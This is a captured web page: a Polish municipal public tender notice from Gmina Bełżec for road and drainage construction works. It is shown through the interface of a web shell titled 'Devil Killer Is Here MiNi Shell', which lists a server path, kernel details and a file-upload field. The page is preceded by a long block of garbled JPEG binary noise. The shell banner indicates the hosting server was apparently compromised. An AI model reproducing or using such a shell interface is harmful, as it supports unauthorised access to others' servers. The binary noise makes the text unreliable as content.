JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230301/0011603401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Poprawa dostępności społeczno – gospodarczej poprzez przebudowę dróg na terenie gminy Bełżec.„ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BEŁŻEC</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950014357</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lwowska 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bełżec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-670</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">846652445</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">846652337</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@belzec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.belzec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Poprawa dostępności społeczno – gospodarczej poprzez przebudowę dróg na terenie gminy Bełżec.„ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b79b85b0-b815-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00116034</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00034168/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 „Poprawa dostępności społeczno – gospodarczej poprzez przebudowę dróg na terenie gminy Bełżec„</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://belzec.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy znajdującej się pod adresem: https://belzec.ezamawiajacy.pl w zakładce „Korespondencja” oraz za pośrednictwem poczty elektronicznej na adres e-mail: gmina@belzec.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy znajdującej się pod adresem:<br/>https://belzec.ezamawiajacy.pl w zakładce „Korespondencja” oraz za pośrednictwem poczty elektronicznej na adres e-mail:<br/>gmina@belzec.pl. Ogólne zasady korzystania z Platformy:<br/>a) Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://belzec.ezamawiajacy.pl lub<br/>https://oneplace.marketplanet.pl .<br/>b) Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”.<br/>Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ.<br/>1) Wniosek należy przesłać za pośrednictwem Platformy Zakupowej przez opcję „Zadaj pytanie” lub przy użyciu zakładki<br/>„Korespondencja”. W celu zadania pytania Zamawiającemu, Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE.<br/>Powoduje to otwarcie okna, w którym należy uzupełnić dane Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu<br/>wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ, Wykonawca uzyskuje<br/>potwierdzenie wysłania pytania poprzez komunikat systemowy &#34;Pytanie wysłane&#34;.<br/>2) Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod<br/>warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu<br/>składania odpowiednio ofert.<br/>3) Jeżeli Zamawiający nie udzieli wyjaśnień w terminie, przedłuży termin składania ofert o czas niezbędny do zapoznania się<br/>wszystkich zainteresowanych Wykonawców z wyjaśnieniami niezbędnymi do należytego przygotowania i złożenia odpowiednio ofert<br/>4) W przypadku gdy wniosek o wyjaśnienie treści SWZ nie wpłynął w terminie, o którym mowa w pkt 2), Zamawiający nie ma<br/>obowiązku udzielania odpowiednio wyjaśnień SWZ oraz obowiązku przedłużenia terminu składania odpowiednio ofert<br/>5) Przedłużenie terminu składania ofert, o których mowa w pkt 4), nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści<br/>odpowiednio SWZ.<br/>Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:<br/>a) dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>b) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W<br/>związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.<br/>Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej.<br/>Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp,<br/>doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar,<br/>gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>Zamawiający określa informacje na temat kodowania i czasu odbioru danych W przypadku wnoszenia wadium w formie poręczenia<br/>lub gwarancji: Składając Ofertę w postaci elektronicznej oryginał dokumentu wadium (poręczenia lub gwarancji) opatrzonego<br/>podpisem elektronicznym osób upoważnionych do jego wystawienia, Wykonawca składa załączając na Platformie w zakładce<br/>„OFERTY” – poprzez wybranie polecenia „dodaj dokument&#34;.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1 Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1, z późn. zm.), dalej RODO, informuję, iż:<br/>1.Administratorem Państwa danych osobowych jest Gmina Bełżec, ul. Lwowska 5, 22-670 Bełżec, adres e-mail: gmina@belzec.pl,<br/>nr tel. 84 6652445.<br/>2.Kontakt z wyznaczonym Inspektorem Ochrony Danych w sprawach dotyczących przetwarzania Państwa danych osobowych oraz<br/>realizacji przysługujących Państwu praw związanych z ich przetwarzaniem możliwy jest pod adresem e-mail: iod@data-partners.pl.<br/>3.Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO, w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego na „Poprawa dostępności społeczno – gospodarczej poprzez przebudowę dróg na terenie gminy<br/>Bełżec.„ prowadzonego w trybie podstawowym.<br/>4.Odbiorcami Państwa danych osobowych mogą być osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania na podstawie art. 18 oraz art. 74 Ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych dalej „Ustawa Pzp”<br/>oraz podmioty, z którymi zawarto umowy powierzenia przetwarzania danych osobowych.<br/>5.Państwa dane osobowe będą przechowywane, zgodnie z art. 78 Ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia. Jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, dane osoboweprzechowywane będą przez cały okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>6.Posiadają Państwo:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących*;<br/>- na podstawie art. 16 RODO prawo do sprostowania danych osobowych Państwa dotyczących**;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych***;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych z siedzibą ul. Stawki 2, 00-193 Warszawa, gdy<br/>Państwo uznają, że przetwarzanie danych osobowych dotyczących Państwa narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Państwu:<br/>- w związku z art. 17 RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>8.Podanie przez Państwa danych osobowych jest niezbędne do przeprowadzenia postępowania<br/>o udzielenie zamówienia publicznego. Niepodanie danych osobowych wyłącza możliwość udziału w wyżej wymienionym<br/>postepowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane na zadaniu inwestycyjnym <br/>pn.: „Poprawa dostępności społeczno – gospodarczej poprzez przebudowę dróg na terenie gminy Bełżec.„ Prowadzone postępowanie dotyczy zadania : „ Budowa połączenia drogi gminnej nr 127550L, pomiędzy drogą wojewódzką nr 865 i gminnym zakładem ujęcia wody w m. Bełżec – Etap I. <br/>Przedmiot inwestycji składa się z nw. robót:<br/>1.	„Budowa skrzyżowania drogi wojewódzkiej nr 865 w km 71+749.50 <br/> z drogą gminną nr 127550L, na działce nr ewid. 1820 w m. Bełżec” (Decyzja Wojewody Lubelskiego nr 159/21 z dnia 2 grudnia 2021r.) <br/>Lokalizacja : „Budowa połączenia drogi gminnej nr 127550L, pomiędzy drogą nr ewid. 1820), kończący się wg lokalizacji po osi drogi gminnej nr 127550L w km 0+008.80. Budowa tego skrzyżowania stanowi element budowy Etapu I budowy drogi gminnej nr 127550L w miejscowości Bełżec, na odcinku, od km 0+003,50 do km 0+128.64 oraz od km 0+144.37 do km 0+243,50.,<br/>2. „Budowa połączenia drogi gminnej nr 127550L, pomiędzy drogą wojewódzką nr 865 i gminnym zakładem ujęcia wody w m. Bełżec, na odcinku: km 0+003.50 ÷ 0+128.64 i km 0+144.37 ÷ 0+534.70” (Decyzja Starosty Tomaszowskiego AB.6740.27.2022z dnia 27 stycznia 2022r.) Lokalizacja Etapu I : km 0+008.80÷0+128.64 i km 0+144.37 ÷ 0+243,5”,<br/>3.	Przebudowa przejazdu kolejowego kat. D. linii kolejowej nr 69 Rejowiec – Hrebenne w km 120.250 na skrzyżowaniu z drogą gminną nr 127550L w m. Bełżec (Zgłoszenie do Wojewody Lubelskiego <br/>Roboty określone w pkt. 1 i 2 obejmują:<br/>a/.	budowę drogi klasy D i przebudowę skrzyżowań<br/>Planowana szerokość jezdni wynosić będzie 5.50m w przekroju ulicznym, z jednostronnym chodnikiem (do km 0+216.10) o szerokości 2.00m.<br/> Konstrukcja: droga, zjazdy zbiorcze i na drogi wewnętrzne <br/>- warstwa ścieralna z betonu asfaltowego AC11S (KR3-4)<br/> wg PN-EN 13108-1 i WT-2 - 4cm<br/>- warstwa wiążąca z betonu asfaltowego AC16W (KR3-4)<br/> AC11W wg PN-EN 13108-1 i WT-2 - 5cm<br/>-	górna warstwa podbudowy z mieszanki kruszywa niezwiązanego<br/>0/31.5, (w tym również przy ulepszaniu poboczy) - 20cm<br/>-	dolna warstwa podbudowy, wzmocnienie podłoża z mieszanki <br/>kruszywa związanego hydraulicznie cementem, klasy C3/4 - 35cm<br/>- krawężnik betonowy na ławie betonowej C8/10 z oporem - 15x30 cm<br/>b/.	budowa odcinków chodnika, (zasadniczo jednostronnego (do km 0+216.10) o szerokości 2.00m.<br/>	Konstrukcja chodnika <br/>-	kostka betonowa brukowa kolorowa - 6 cm<br/>-	podsypka cementowo- piaskowa 1:4 - 4 cm<br/>-	warstwa ulepszonego podłoża z mieszanki kruszywa <br/>związanego hydraulicznie cementem, klasy C3/4 - 15cm<br/>-	obrzeże betonowe na ławie betonowej C8/10 z oporem - 8x30cm<br/>c/.	poprawa dostępności do przyległych działek, (zjazdy gospodarcze szer. 4.50m, pozostałe, w tym na drogi wewnętrzne szer. 5.0m) <br/>Konstrukcja zjazdów gospodarczych<br/>-	kostka betonowa brukowa szara - 8 cm<br/>-	podsypka cementowo- piaskowa 1:4 - 4 cm<br/>-	górna warstwa podbudowy z mieszanki kruszywa niezwiązanego 0/31.5	- 15cm <br/>-	warstwa ulepszonego podłoża z mieszanki kruszywa <br/> związanego hydraulicznie cementem, klasy C3/4 - 15cm<br/>-	obrzeże betonowe na ławie betonowej C8/10 z oporem - 8x30cm<br/>d/.	wykonanie powierzchniowo-wgłębnego system odwodnienia uwzględniając istniejące naturalne ukształtowanie terenu oraz istniejącą i projektowaną infrastrukturę techniczną<br/>d.1. Roboty w pasie drogi wojewódzkiej nr 865 <br/> W celu odprowadzenia wód opadowych z drogi gminnej nr 127550L zaprojektowano kanał deszczowy składający się z dwóch odcinków:<br/>- odcinek nr 1 (od istniejącej studni do studni projektowanej) o długości 9,50m wykonany metodą przecisku z rur PE100 RC PN 10 dwuwarstwowej o średnicy 450x26/7mm,<br/>- odcinek nr 2 (od projektowanej studni do granicy pasa drogowego) wykonany metodą wykopu otwartego z rur kielichowych kanalizacyjnych PVC o średnicy 400x11,7 mm łączonych na uszczelkę wargową. Łączna długość kanału w pasie drogi wojewódzkiej nr 865 (działka nr 1820) wynosi 11,0 m.<br/>Projektowany kanał zostanie podłączony do kanalizacji deszczowej Φ500 mm znajdującej się w jezdni w/w drodze wojewódzkiej poprzez wpięcie do istniejącej studni betonowej o średnicy 1200 mm. Na załamaniu trasy rurociągu zaprojektowano studnię rewizyjną (D1) wykonaną z prefabrykowanych kręgów betonowych z betonu żwirowego klasy B25 (C20/C25 wg PN-EN 206-1) o średnicy wewnętrznej 1200 z felcem i przykrywą. Dopuszcza się zwieńczenie studni za pomocą prefabrykowanej zwężki Φ1000/600 mm wówczas płyta żelbetowa nie występuje. <br/>W celu przechwycenia wody opadowej spływającej powierzchniowo z drogi gminnej, bezpośrednio przed jej skrzyżowaniem z drogą wojewódzką 865 (w km 0+008,0 drogi gminnej) zaprojektowano odwodnienie liniowe w postaci koryta betonowego D400 o przekroju zewnętrznym szer. x wys. 400x 400mm długości 6,5m z rusztem żeliwnym, klasa obciążenia D400. <br/>d.2. Roboty w pasie drogi gminnej nr 127550L<br/>d.2.1.Zbiornik retencyjny wód opadowych<br/>W celu zagospodarowania wód opadowych odprowadzanych projektowanym rowem przydrożnym z odwodnienia drogi gminnej zaproponowano wykonanie zbiornika retencyjnego wód opadowych zlokalizowanego na działce nr 2677 należącej do Gminy Bełżec.<br/>Biorąc pod uwagę ukształtowanie terenu w miejscu lokalizacji zbiornika zaprojektowano zbiornik ziemny wkopany na głębokość od 1,19 do 2,92 poniżej istniejącego poziomu gruntu oraz z trzech stron ogroblowany.<br/>Umocnienie dna i skarp (powyżej maksymalnego poziomu wody) za pomocą płyt betonowych ażurowych o wymiarach 60x40x10 cm, powyżej skarpa odwodna, korona grobli oraz jej skarpa odpowietrzna zostaną umocnione biologicznie poprzez obsiew skarp nasionami traw na warstwie humusu grubości 5 cm. Zgodnie z opinią Wojewódzkiego Urzędu Ochrony Zabytków w Lublinie IN.III.5183.32.3.2021 z dnia 24.03.2021 r. skarpa odpowietrzna zbiornika od strony wschodniej zostanie obsadzona krzewami.<br/> W celu umożliwienia awaryjnego odprowadzania wody ze zbiornika zaprojektowano studnię spustowo- przelewową wykonaną z kręgów betonowych o średnicy 1200 mm o wysokości 3,80 m z osadnikiem o głębokości 0,55 m. Przelew awaryjny składa się z wlotu betonowego z progiem przelewowym oraz rurociągu doprowadzającego wodę ze zbiornika do studni połączeniowej.<br/>Oprócz przelewu awaryjnego zbiornik wyposażony został w rurociąg z zamontowaną zasuwą umożliwiający całkowite jego opróżnienie z wody.<br/>Ze względów bezpieczeństwa zbiornik będzie ogrodzony ze wszystkich stron z uwzględnieniem bramy wjazdowej od strony południowej (ogrodzenie wykonane z paneli ogrodzeniowych Ø 4mm 3D).<br/>d.2.2. Rów odpływowy od granicy terenu zamkniętego do wylotu ze zbiornika retencyjnego <br/>Poniżej wylotu z rurociągu awaryjnego zbiornika retencyjnego do granicy terenu zamkniętego (do działki nr 1638 od jej południowej strony) zaprojektowano rów otwarty o długości 16,1 m, (dno rowu i jego skarpy umocnione płytami betonowymi ażurowymi o wymiarach 60x40x8 cm).<br/> Do w/w rowu podłączone zostaną dwa przykanaliki odprowadzające wodę z ulicznych wpustów deszczowych zamontowanych w jezdni drogi gminnej.<br/>d.2.3. Odprowadzenie wód opadowych z drogi gminnej powyżej projektowanego zbiornika retencyjnego wód opadowych.<br/>Powyżej zbiornika retencyjnego wód opadowych zaprojektowano odcinek kanalizacji deszczowej o łącznej długości 29,2 m wykonany z rur PVC kanalizacyjnych kielichowych SN8 o średnicy 400x11,7 mm. Rurociąg kryty umożliwia jednoczenie przejście pod skrzyżowaniem z boczną drogą. Na załamaniach oraz na końcówce projektowanego rurociągu przewidziano typowe studnie kanalizacyjne w ilości 3 szt.(D7, D8 i D9) z kręgów betonowych średnicy 1200 mm. Wlot rowu otwartego do końcowej studni za pomocą typowego osadnika betonowego. Powyżej osadnika zaprojektowano rów otwarty o długości 138,5 m z umocnieniem. <br/>Przejście z odwodnieniem przez projektowaną drogę w rejonie jej skrzyżowania z drogami bocznymi (w rejonie km 0+386) poprowadzono rurociągiem krytym długości 27,8 m wykonanym z rur PVC kanalizacyjnych kielichowych SN8 o średnicy 400x11,7 mm. Na rurociągu zaprojektowano dwie studnie rewizyjne (D10 i D11) o średnicy 1200 mm. <br/>W celu przejęcia wody spływającej drogą boczną (przy skrzyżowaniu od strony południowej) zaprojektowano odwodnienie liniowe zaprojektowano odwodnienie liniowe w postaci podwójnego koryta betonowego D400 (500x500) z betonu klasy C35/45.<br/>Ostatni odcinek odprowadzenia wód (od studni D11 w górę) za pomocą rowu otwartego usytuowanego od strony napływu wody (strona południowa) o długości 125,0 m z umocnieniem).<br/> Na projektowanych zjazdach przewidziano przepusty o średnicy 50 cm długości 6,0 m (łącznie 4 szt.), natomiast przy końcówce projektowanej drogi (przed wjazdem na stację wodociągową) zaprojektowano przepust o średnicy 60 cm długości 10,0 m, który ma za zadanie przeprowadzić wody opadowe pod koroną w/w drogi.<br/>e/.	przebudowa (usunięcie kolizji urządzeń elektroenergetycznych)<br/>	Zakres prac obejmuje likwidację kolizji na robotach 2. Szczegóły, zawarte są <br/>w projekcie, zgodnie z warunkami i uzgodnieniem PGE Dystrybucja S.A. Oddział Zamość Rejon Energetyczny Tomaszów Lubelski.<br/>f/.	budowa oświetlenia ulicznego – roboty dla Etap I<br/>Zakres prac obejmuje wykonanie oświetlenia ulicznego odcinka Zadania nr 2: <br/>- montaż szafy oświetleniowej – szt. 1,<br/>-linii kablowej oświetlenia ulicznego o dług. 121 m,<br/>- montaż 5 szt słupów.<br/>g/. budowa kanału technologicznego<br/>Zakres prac obejmuje wykonanie odcinka kanału technologicznego i montaż studni telekomunikacyjnej <br/>h/.	organizacji ruchu 